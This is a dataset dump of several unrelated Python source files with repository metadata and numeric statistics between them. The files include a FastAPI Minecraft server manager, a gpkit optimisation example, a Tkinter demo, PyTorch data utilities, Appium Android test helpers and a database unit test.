ArgumentParser(description='Run minecraft-socket server.') parser.add_argument('--config', default='config.json', help='Path to config file (JSON)') args = parser.parse_args() try: with open(args.config, 'r') as c: os.environ['MC-CONFIG'] = json.dumps(json.load(c)) except JSONDecodeError: print('FATAL: Bad JSON structure.') exit(0) except FileNotFoundError: print(f'FATAL: {args.config} not found.') exit(0) CONF = json.loads(os.environ['MC-CONFIG']) uvicorn.run('main:app', host=CONF['runtime']['host'], port=CONF['runtime']['port'], access_log=False) else: try: CONFIG = json.loads(os.environ['MC-CONFIG']) except: print(f'FATAL: config not loaded.') exit(0) logging.basicConfig( format=CONFIG["logging"]["format"], level=logging.getLevelName(CONFIG["logging"]["level"].upper()), ) info('Loading connection to DB') db = CONFIG['database'] mongodb = MongoClient( host=db['ip'], port=db['port'], username=db['username'], password=db['password'], tls=db['secure'] ) database = mongodb.minecraft_socket info('Starting fetch thread.') fetch_thread = threading.Thread(target=fetch_loop, name='mcjar_fetch_thread', daemon=True, args=[database]) fetch_thread.start() info('Checking env setup.') if not os.path.exists(CONFIG['server_folder']): os.makedirs(CONFIG['server_folder']) info('Starting server manager.') manager = server_manager.ServerManager(CONFIG['server_folder'], database) app = FastAPI() app.mount('/web', StaticFiles(directory='web'), 'staticfiles') @app.get('/') async def get_index(): return FileResponse(os.path.join('web', 'index.html')) @app.middleware('http') async def auth(request: Request, call_next): for k in list(AUTHENTICATED_CONNECTIONS.keys()): if AUTHENTICATED_CONNECTIONS[k]+CONFIG['connection_timeout'] < time.time(): del AUTHENTICATED_CONNECTIONS[k] if request.url.path == '/' or request.url.path.startswith('/web') or request.url.path == '/auth': return await call_next(request) else: if 'x-authkey' in request.headers.keys(): if request.headers['x-authkey'] in AUTHENTICATED_CONNECTIONS.keys(): return await call_next(request) else: return JSONResponse({'result': 'failure', 'reason': 'Auth key not recognized.'}, HTTP_403_FORBIDDEN) else: return JSONResponse({'result': 'failure', 'reason': 'Auth key not passed in headers.'}, HTTP_403_FORBIDDEN) @app.post('/auth') async def post_auth(request: Request, response: Response): model = await request.json() hashed_pass = hashlib.sha256(CONFIG['password'].encode('utf-8')).hexdigest() if hashed_pass == model['passhash']: cid = hashlib.sha256(str(time.time()+random.random()).encode('utf-8')).hexdigest() AUTHENTICATED_CONNECTIONS[cid] = time.time() return {'result': 'success', 'connection_id': cid} else: response.status_code = HTTP_403_FORBIDDEN return {'result': 'failure', 'reason': 'Incorrect passcode.'} @app.get('/versions') async def get_versions(response: Response, request: Request): try: res = database.versions.find_one({'record': 'versions'}) del res['_id'] del res['record'] return res except: return { 'latest': {'release': None, 'snapshot': None}, 'paper': {}, 'vanilla': {} } @app.post('/servers/new') async def new_server(req: Request, res: Response): fields = defaults(await req.json(), defs={ 'max_memory': 2, # GB 'name': f'server_{int(time.time())}', 'server_port': 25565, 'server_ip': '', 'world_seed': '', 'whitelist': True, 'max_players': 20, 'difficulty': 'hard', 'gamemode': 'survival', 'motd': 'Minecraft Server Running on Minecraft-Socket [iTecAI]', 'command_blocks': True, 'other_args': '' }) # also requires {jar: url or base-64 encoded jar} if os.path.exists(os.path.join(CONFIG['server_folder'], fields['name'])): res.status_code = HTTP_405_METHOD_NOT_ALLOWED return {'result': 'failure', 'reason': f'Server {fields["name"]} already exists.'} if not 'jar' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Server jar not specified'} info(f'Creating new server {fields["name"]} running at {fields["server_ip"]}:{fields["server_port"]}.') os.mkdir(os.path.join(CONFIG['server_folder'], fields['name'])) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'eula.txt'), 'w') as f: f.write('eula=true') with open('server.properties.template', 'r') as f: properties = f.read().format( gamemode=fields['gamemode'], cmdblocks='true' if fields['command_blocks'] else 'false', motd=fields['motd'], seed=fields['world_seed'], difficulty=fields['difficulty'], max_players=str(fields['max_players']), server_ip=fields['server_ip'], server_port=str(fields['server_port']), whitelist='true' if fields['whitelist'] else 'false' ) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.properties'), 'w') as f: f.write(properties) database.servers.insert_one({ 'max_memory': fields['max_memory'], 'name': fields['name'], 'java_args': fields['other_args'], 'address': fields['server_ip']+':'+str(fields['server_port']), 'enabled': True }) if 'https://' in fields['jar'] or 'http://' in fields['jar']: response = requests.get(fields['jar'], stream=True) with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd: for chunk in response.iter_content(chunk_size=128): fd.write(chunk) else: with open(os.path.join(CONFIG['server_folder'], fields['name'], 'server.jar'), 'wb') as fd: fd.write(base64.b64decode(fields['jar'].split('base64,')[1].encode('utf-8'))) manager.start_server(fields['name']) return {'result': 'success'} @app.post('/servers/{name}/stop') async def stop_server(name: str, res: Response): try: manager.stop_server(name) return {'result': 'success'} except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} @app.post('/servers/{name}/delete') async def delete_server(name: str, res: Response): try: manager.stop_server(name) except KeyError: pass database.servers.delete_one({'name': name}) return {'result': 'success'} @app.get('/servers/{name}/logs') async def get_logs(name: str, res: Response): try: manager.get_logs(name) return {'result': 'success', 'logs': manager.get_logs(name)} except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} @app.post('/servers/{name}/command') async def command_server(name: str, res: Response, req: Request): fields = await req.json() if not 'command' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Command not passed'} try: manager.command_server(name, fields['command']) except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} return {'result': 'success'} @app.post('/servers/{name}/start') async def start_server(name: str, res: Response): try: manager.start_server(name) except KeyError: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} not online.'} return {'result': 'success'} @app.post('/servers/{name}/modify_prop') async def start_server(name: str, res: Response, req: Request): fields = await req.json() if not 'content' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Content not passed.'} if database.servers.find_one({'name': name}): with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f: f.write(fields['content']) else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.post('/servers/{name}/modify_spec') async def start_server(name: str, res: Response, req: Request): fields = await req.json() if not 'content' in fields.keys(): res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Content not passed.'} if database.servers.find_one({'name': name}): try: database.servers.replace_one({'name': name}, json.loads(fields['content'])) return {'result': 'success'} except: res.status_code = HTTP_400_BAD_REQUEST return {'result': 'failure', 'reason': 'Bad content format.'} else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.get('/servers/{name}/') async def get_server_info(name: str, res: Response): spec = database.servers.find_one({'name': name}) if spec: del spec['_id'] with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f: props = f.read() return { 'result': 'success', 'spec': spec, 'prop': props, 'running': name in manager.servers.keys() } else: res.status_code = HTTP_404_NOT_FOUND return {'result': 'failure', 'reason': f'Server {name} does not exist.'} @app.get('/servers') async def list_servers(): server_dict = {} for s in database.servers.find(): if os.path.exists(os.path.join(CONFIG['server_folder'], s['name'])): server_dict[s['name']] = { 'autostart': s['enabled'], 'running': s['name'] in manager.servers.keys(), 'address': s['address'], 'mem': s['max_memory'] } return server_dict
38.214058
142
0.621269
1,449
11,961
5.004831
0.198068
0.038058
0.041919
0.048263
0.338389
0.322532
0.295229
0.288748
0.273442
0.258825
0
0.009465
0.222724
11,961
313
143
38.214058
0.770571
0.006688
0
0.266904
0
0.003559
0.234804
0.018269
0
0
0
0
0
1
0.003559
false
0.032028
0.078292
0
0.192171
0.010676
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8235474f3f587b0e7b47abaf477920cd055a7941
82
py
Python
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
1
2020-07-30T12:48:17.000Z
2020-07-30T12:48:17.000Z
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
null
null
null
weather/weatherapi/key.py
Stephen-Kamau/Weather_Api
b9d70f564fe055dc1400dc49d856eed95a9603ee
[ "MIT" ]
null
null
null
#my open weather api key to access the resourses api_key = "enter your key here"
20.5
48
0.756098
15
82
4.066667
0.8
0.196721
0
0
0
0
0
0
0
0
0
0
0.195122
82
3
49
27.333333
0.924242
0.573171
0
0
0
0
0.575758
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
82371535c737935c03e91ede47e391e948acafe2
567
py
Python
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
docs/source/examples/simple_sp.py
giserh/gpkit
71b953fcac8f67f148b67b54b6e8cd4182dc0b3b
[ "MIT" ]
null
null
null
"""Adapted from t_SP in tests/t_geometric_program.py""" import gpkit # Decision variables x = gpkit.Variable('x') y = gpkit.Variable('y') # must enable signomials for subtraction with gpkit.SignomialsEnabled(): constraints = [x >= 1-y, y <= 0.1] # create and solve the SP m = gpkit.Model(x, constraints) print(m.localsolve(verbosity=0).summary()) assert abs(m.solution(x) - 0.9) < 1e-6 # full interim solutions are available print("x values of each GP solve (note convergence)") print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
28.35
79
0.705467
88
567
4.511364
0.659091
0.065491
0
0
0
0
0
0
0
0
0
0.018443
0.13933
567
19
80
29.842105
0.795082
0.29806
0
0
0
0
0.167095
0
0
0
0
0
0.1
1
0
false
0
0.1
0
0.1
0.3
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8237ae1f3b2386a6d8ebda2469e470afeb0c3eb1
140
py
Python
cride/circles/urls.py
jgmc3012/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
null
null
null
cride/circles/urls.py
jgmc3012/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
5
2020-06-30T21:41:49.000Z
2021-09-08T02:15:04.000Z
cride/circles/urls.py
jmillandev/cride
19401b5c19aa706c9928c12195fd8303d75f1d49
[ "MIT" ]
null
null
null
from django.urls import path from cride.circles.views import ListCreateAPIView urlpatterns = [ path('', ListCreateAPIView.as_view()) ]
20
49
0.764286
16
140
6.625
0.75
0
0
0
0
0
0
0
0
0
0
0
0.135714
140
7
50
20
0.876033
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.4
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
8237d91bd367fa37819ecabb2d7d852f0f4245f3
550
py
Python
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
aula075.py
juniorpedroso/CFBCursos
88657d6aad38de7d41e76499f0ff4d85a02745ae
[ "MIT" ]
null
null
null
# Aula 75 - SpinBox from tkinter import * app = Tk() app.title('Pedroso') app.geometry('500x300') def exibirValor(): vvalor = sb_valores.get() l_valor.config(text=vvalor) # sb_valores = Spinbox(app, from_=0, to=10) # Os valores podem ser informados por uma faixa, como acima, # ou como abaixo, em uma tupla sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10)) sb_valores.pack() l_valor = Label(app, text='Valor') l_valor.pack() btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor) btn_exibeValor.pack() app.mainloop()
19.642857
69
0.705455
85
550
4.447059
0.6
0.095238
0.079365
0.100529
0
0
0
0
0
0
0
0.036403
0.150909
550
27
70
20.37037
0.773019
0.267273
0
0
0
0
0.075377
0
0
0
0
0
0
1
0.071429
false
0
0.071429
0
0.142857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
823a986d979638441ae38a1104614b823b72f2d7
3,922
py
Python
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
src/data/dataset_utils.py
GuillaumeBarree/challenge-ENS
50f1faa58be50a7c8cbd6078b4495679fd112c05
[ "MIT" ]
null
null
null
"""This file contains all functions related to the dataset.""" # pylint: disable=import-error import os import tqdm import numpy as np import pandas as pd from sklearn.model_selection import train_test_split from torch.utils.data import Dataset class RegressionDataset(Dataset): """Create a Torch Dataset for our regression problem.""" def __init__(self, x_data, y_data): self.x_data = x_data self.y_data = y_data def __getitem__(self, index): return self.x_data[index], self.y_data[index] def __len__(self): return len(self.y_data) def basic_random_split(path_to_train, valid_ratio=0.2): """This function split file according to a ratio to create training and validation. Args: path_to_train (str): path of the data root directory. valid_ratio (float): ratio of data for validation dataset. Returns: dict: Dictionary containing every data to create a Dataset. """ # Load the different files training_data = load_files(path_to_data=path_to_train) # Prepare features and targets features_and_targets = remove_useless_features(training_data=training_data) features_and_targets = create_x_and_y( input_data=features_and_targets, valid_ratio=valid_ratio ) return features_and_targets def load_test_data(path_to_test): """This function load test data Args: path_to_test (str): path of the data root directory. Returns: dict: Dictionary containing every data to create a Dataset. """ # Load the different files test_data = load_files(path_to_data=path_to_test) # Drop useless test_data["input"] = test_data["input"].drop(columns=["_ID"]) # Create a target test_data["target"] = np.ones((len(test_data["input"]))) feature_and_target = { "x_test": test_data["input"].to_numpy(), "y_test": np.ones((len(test_data["input"]))).ravel(), } return feature_and_target def load_files(path_to_data): """Load data input files. Args: path_to_data (str): path of the data root directory. Returns: list(pandas.core.frame.DataFrame): List of Dataframe containing data from each file. """ data = {} data_files = os.listdir(path_to_data) for datafile in tqdm.tqdm(data_files): if "input" in datafile: data["input"] = pd.read_csv( os.path.join(path_to_data, datafile), delimiter=",", decimal="." ) else: data["target"] = pd.read_csv( os.path.join(path_to_data, datafile), delimiter=",", decimal="." ) return data def remove_useless_features(training_data): """Create features and targets Args: training_data (list): List of Dataframe containing data from each file. Returns: dict : Dictionary containing features and target for each file. """ data_dict = {} for key, data in training_data.items(): features = data.drop(columns=["_ID"]) data_dict[key] = features return data_dict def create_x_and_y(input_data, valid_ratio): # pylint: disable=too-many-locals """Generate train, valid and test for each file and for each target. Args: input_data (dict): Features and targets for one file. valid_ratio (float): Test and validation ratio. Returns: dict: train, valid and test inputs and targets. """ feature_and_target = {} x_train, x_valid, y_train, y_valid = train_test_split( input_data["input"], input_data["target"], test_size=valid_ratio, random_state=0 ) y_train = y_train.values.ravel() y_valid = y_valid.values.ravel() feature_and_target = { "x_train": x_train.to_numpy(), "y_train": y_train, "x_valid": x_valid.to_numpy(), "y_valid": y_valid, } return feature_and_target
26.863014
92
0.661652
539
3,922
4.54731
0.207792
0.031824
0.02856
0.014688
0.28927
0.25459
0.20155
0.189718
0.106079
0.106079
0
0.001006
0.239419
3,922
145
93
27.048276
0.82065
0.343447
0
0.095238
0
0
0.044702
0
0
0
0
0
0
1
0.126984
false
0
0.095238
0.031746
0.349206
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
823c37e204f339ffbed684b109b1de9e326b50a2
65
py
Python
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
1
2021-02-19T16:06:07.000Z
2021-02-19T16:06:07.000Z
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
null
null
null
gemlog_from_rss/spip/__init__.py
Hookz/Gemlog-from-RSS
b57a311db3008e8b0df2442236c4729a06d9b74d
[ "MIT" ]
null
null
null
from .content import SinglePost from .page import Page, MainPage
21.666667
32
0.815385
9
65
5.888889
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.138462
65
2
33
32.5
0.946429
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
5
8240cdb3f22524daceb3ca1aaf3cf523bd2c0df4
12,619
py
Python
poseidon/ui/mobile/android/base_page.py
peterkang2001/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
2
2019-12-27T09:14:38.000Z
2019-12-27T09:16:29.000Z
poseidon/ui/mobile/android/base_page.py
CodeMonkey4Fun/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
2
2021-03-31T20:06:21.000Z
2021-12-13T20:48:16.000Z
poseidon/ui/mobile/android/base_page.py
peterkang2001/Poseidon
cfafc01a1f69210dbfd95a0c62e06269eb599034
[ "Apache-2.0" ]
1
2020-11-13T07:37:01.000Z
2020-11-13T07:37:01.000Z
# coding=utf-8 """ @author:songmengyun @file: base_page.py @time: 2020/01/03 """ import time import logging from selenium.webdriver.common.by import By from appium.webdriver.common.touch_action import TouchAction from selenium.webdriver.support.wait import WebDriverWait from appium.webdriver.mobilecommand import MobileCommand from appium.webdriver.connectiontype import ConnectionType from poseidon.ui.util.location import * from poseidon.base import CommonBase as cb from poseidon.ui.mobile.android.android_keycode import KEYCODE class Swipe: '''滚动屏幕相关''' def __init__(self, driver): self.driver = driver def swipe_up(self, width, height, n=5): '''定义向上滑动方法''' logging.info("定义向上滑动方法") x1 = width * 0.5 y1 = height * 0.9 y2 = height * 0.25 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x1, y2) def swipe_down(self, width, height, n=5): '''定义向下滑动方法''' logging.info("定义向下滑动方法") x1 = width * 0.5 y1 = height * 0.25 y2 = height * 0.9 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x1, y2) def swipe_left(self, width, height, n=5): '''定义向左滑动方法''' logging.info("定义向左滑动方法") x1 = width * 0.8 x2 = width * 0.2 y1 = height * 0.5 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x2, y1) def swipe_right(self, width, height, n=5): '''定义向右滑动方法''' logging.info("定义向右滑动方法") x1 = width * 0.2 x2 = width * 0.8 y1 = height * 0.5 time.sleep(3) logging.info("滑动前") for i in range(n): logging.info("第%d次滑屏" % i) time.sleep(3) self.driver.swipe(x1, y1, x2, y1) class Action: '''操作手机通知栏/获取元素''' def __init__(self, driver): self.driver = driver self.action = TouchAction(self.driver) def get_element(self, locator): """ 通过传入的locator获取selenium webelement对象 :param locator: :return: """ locator_type = locator[0] element = None if locator_type == By.ID: element = findId(self.driver, locator[1]) logging.debug("使用 id 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.XPATH: element = findXpath(self.driver, locator[1]) logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.LINK_TEXT: element = findLinkText(self.driver, locator[1]) logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.PARTIAL_LINK_TEXT: element = findPLinkText(self.driver, locator[1]) logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.NAME: element = findName(self.driver, locator[1]) logging.debug("使用 name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.TAG_NAME: element = findTagName(self.driver, locator[1]) logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CLASS_NAME: element = findClassName(self.driver, locator[1]) logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CSS_SELECTOR: element = findCss(self.driver, locator[1]) logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1])) else: logging.error("错误的locator_type,请确认") return element def get_elements(self, locator): """ 通过传入的locator获取selenium webelements对象 :param locator: :return: """ locator_type = locator[0] elements = None if locator_type == By.ID: elements = findsId(self.driver, locator[1]) logging.debug("使用 id 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.XPATH: elements = findsXpath(self.driver, locator[1]) logging.debug("使用 xpath 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.LINK_TEXT: elements = findsLinkText(self.driver, locator[1]) logging.debug("使用 link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.PARTIAL_LINK_TEXT: elements = findsPLinkText(self.driver, locator[1]) logging.debug("使用 partial link text 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.NAME: elements = findsName(self.driver, locator[1]) logging.debug("使用 name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.TAG_NAME: elements = findsTagName(self.driver, locator[1]) logging.debug("使用 tag name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CLASS_NAME: elements = findsClassName(self.driver, locator[1]) logging.debug("使用 class name 定位元素 ==> {0}".format(locator[1])) elif locator_type == By.CSS_SELECTOR: elements = findsCss(self.driver, locator[1]) logging.debug("使用 css selector 定位元素 ==> {0}".format(locator[1])) else: logging.error("错误的locator_type,请确认") return elements def set_touch_pwd(self, locator): ''' 设置手势解锁 :param locator: 获取第一个触摸点的坐标location及size :return: ''' start = self.get_element(locator) start_height = start.size['height'] # start_width = start.size['width'] start_x = start.location['x'] start_y = start.location['y'] begin_x = start_x + start_width / 2 begin_y = start_y + start_height / 2 action = TouchAction(self.driver) action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\ move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\ move_to(x=begin_x, y=start_y + start_height * 2).release().perform() def adjust_volume(self, size): '''调节系统音量,变大或变小''' def adjust_brightness(self, size): '''调节屏幕亮度,变大或变小''' def clean_notification_bar_message(self): '''清空通知栏消息''' self.driver.open_notifications() # 打开下拉通知栏 def open_close_wifi(self): '''打开/关闭Wi-Fi''' def airplane_mode(self): '''打开飞行模式''' class KeyEvent: '''按键事件''' def __init__(self, driver): self.driver = driver def volume(self, size:int) -> None: '''按键系统音量变大或变小''' if size >=0: for i in range(0, size): self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP) # 音量大键 else: for i in range(size, 0): self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN) # 音量小键 self.driver.press_keycode(KEYCODE.KEYCODE_BACK) # 返回键 class AssertBase: '''断言相关''' def __init__(self, driver): self.driver = driver @cb.com_try_catch def check_current_activity(self, app_activity): '''验证当前activity是否登录传入app_activity''' current_activity = self.driver.current_activity if current_activity: cb.checkEqual(current_activity, app_activity) else: logging.error('当前没有app_activity') class BasePage(Swipe, Action, KeyEvent, AssertBase): '''其他通过方法''' def __init__(self, driver): self.driver = driver super().__init__(driver=self.driver) @cb.com_try_catch def install_app(self, app_path:str, app_package:str): ''' :param app_path: 安装包路径 :param app_package: 安装包包名 :return: 先判断是否安装: 如果未安装,则执行安装 ''' if self.driver.is_app_installed(app_package): logging.info(f'{app_package}已安装') else: self.driver.install_app(app_path) logging.info(f'{app_package}安装成功') @cb.com_try_catch def uninstall_app(self, app_package:str): ''' :param app_package: 安装包包名 :return: 先判断是否安装: 如果已安装,执行卸载 ''' if self.driver.is_app_installed(app_package): self.driver.remove_app(app_package) logging.info(f'{app_package}卸载成功') else: logging.info(f'{app_package}已卸载') @cb.com_try_catch def open_app(self, app_package:str, app_activity:str) -> None: ''' :param app_package: 需要打开的应用名 :param app_activity: 需要打开的界面 :return: 在当前应用中打开一个activity或者启动一个新应用并打开一个 activity ''' logging.info(f'当前activity: {self.driver.current_activity}') self.driver.start_activity(app_package, app_activity) logging.info(f'当前activity: {self.driver.current_activity}') def app_strings(self): '''返回应用程序的字符串''' string = self.driver.app_strings(language='en') return string @cb.com_try_catch def get_app_package_info(self): """ :return: 输出短信程序包名和界面名 """ return [self.driver.current_package, self.driver.current_activity] @cb.com_try_catch def get_window_info(self): '''获取屏幕宽度和高度''' size = self.driver.get_window_size() width = size['width'] height = size['height'] return [width, height] def lock_app(self): '''锁定屏幕''' self.driver.lock(5) def hide_keyboard(self): '''收起键盘''' self.driver.hide_keyboard() def shake_app(self): '''模拟设备摇晃''' self.driver.shake() def current_content(self): '''进入指定上下文''' current_content = self.driver.current_context # 列出当前上下文 current_contents = self.driver.contents # 列出所有的可用上下文 return current_content @cb.com_try_catch def backgroup_app(self, seconds:int, restart=True): '''backgroup app seconds''' if restart == True: self.driver.background_app(seconds) else: pass @cb.com_try_catch def wait(self, fun, timeout=10, fre=1): ''' :param : 显示等待 :return: ''' wait = WebDriverWait(self.driver, timeout, fre) wait.until(fun) @cb.com_try_catch def click_element(self, locator, is_button=True): """ 点击 :param locator: :param is_button: :return: """ element = self.get_element(locator) if is_button: element.click() else: element = self.get_element(locator) TouchAction(self.driver).tap(element).perform() @cb.com_try_catch def set_text(self, locator, values): """ 为输入框 输入字符内容 :param locator: :param values: :return: """ text_field = self.get_element(locator) text_field.clear() text_field.send_keys(values) def clean_app_cash(self,app_package): '''清除app缓存''' def is_displayed(self, locator, mark=True): """ 判断某个元素是否存在 :param locator: :return: """ element = self.get_element(locator) if mark: self.hight_light(element) return element.is_displayed() def hight_light(self, element, times=2, seconds=2, color="red", border=2): """ 传入selenium webelement对象如果能找到就高亮显示 :param element: :param times: :param seconds: :return: """ js = "element = arguments[0]; " \ "original_style = element.getAttribute('style'); " \ "element.setAttribute('style', original_style + \";" \ "border: %spx solid %s;\");" \ "setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" %(border,color) try: for i in range(0, times): self.driver.execute_script(js, element) except Exception as e: logging.error(e) def switch_h5_app(self, context): self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context}) def find_item(self, el): '''验证页面元素是否存在''' logging.info(f'验证页面元素:{el} 是否存在') source = self.driver.page_source if el in source: return True else: return False
29.902844
113
0.576908
1,479
12,619
4.770791
0.198107
0.085034
0.029478
0.040816
0.452664
0.3947
0.353033
0.293651
0.273243
0.257653
0
0.017684
0.296458
12,619
421
114
29.973872
0.777089
0.083842
0
0.393701
0
0
0.085046
0.015529
0
0
0
0
0.007874
1
0.149606
false
0.003937
0.03937
0
0.244094
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8240d9157af0d451e4630f0ef6ada12168952405
1,957
py
Python
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
6
2015-01-28T05:59:08.000Z
2018-01-09T07:48:57.000Z
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
2
2020-05-09T16:36:43.000Z
2020-05-09T16:52:35.000Z
tests/test_models/test_task_error.py
wikimedia/analytics-wikimetrics
1d2036657b06ccd16ecfc76edd3f9a6119ff75f4
[ "MIT" ]
1
2016-01-13T07:19:44.000Z
2016-01-13T07:19:44.000Z
import celery from nose.tools import assert_equal, assert_true from datetime import datetime from wikimetrics.models import TaskErrorStore, ReportStore from ..fixtures import DatabaseTest class TaskErrorStoreTest(DatabaseTest): def setUp(self): DatabaseTest.setUp(self) self.report = ReportStore(status=celery.states.PENDING) self.session.add(self.report) self.session.commit() def test_add_new(self): # If the failing report has no previous errors, # a new task error should be created. t1 = datetime.now().replace(microsecond=0) TaskErrorStore.add('report', self.report.id, 'message', 'traceback') t2 = datetime.now().replace(microsecond=0) row = self.session.query(TaskErrorStore).first() assert_equal(row.task_type, 'report') assert_equal(row.task_id, self.report.id) assert_true(row.timestamp >= t1 and row.timestamp <= t2) assert_equal(row.message, 'message') assert_equal(row.traceback, 'traceback') assert_equal(row.count, 1) def test_add_existing(self): # If the failing report has previous errors, # the existing task error should be updated. t1 = datetime.now() te = TaskErrorStore(task_type='report', task_id=self.report.id, count=1, timestamp=t1, message='message', traceback='traceback') self.session.add(te) self.session.commit() TaskErrorStore.add('report', self.report.id, 'message2', 'traceback2') t2 = datetime.now() row = self.session.query(TaskErrorStore).first() print t1, row.timestamp, t2 assert_equal(row.task_type, 'report') assert_equal(row.task_id, self.report.id) assert_true(row.timestamp > t1 and row.timestamp < t2) assert_equal(row.message, 'message2') assert_equal(row.traceback, 'traceback2') assert_equal(row.count, 2)
39.938776
83
0.66326
239
1,957
5.330544
0.276151
0.094976
0.10989
0.056515
0.417582
0.356358
0.191523
0.191523
0.191523
0.191523
0
0.01321
0.226367
1,957
48
84
40.770833
0.828269
0.085335
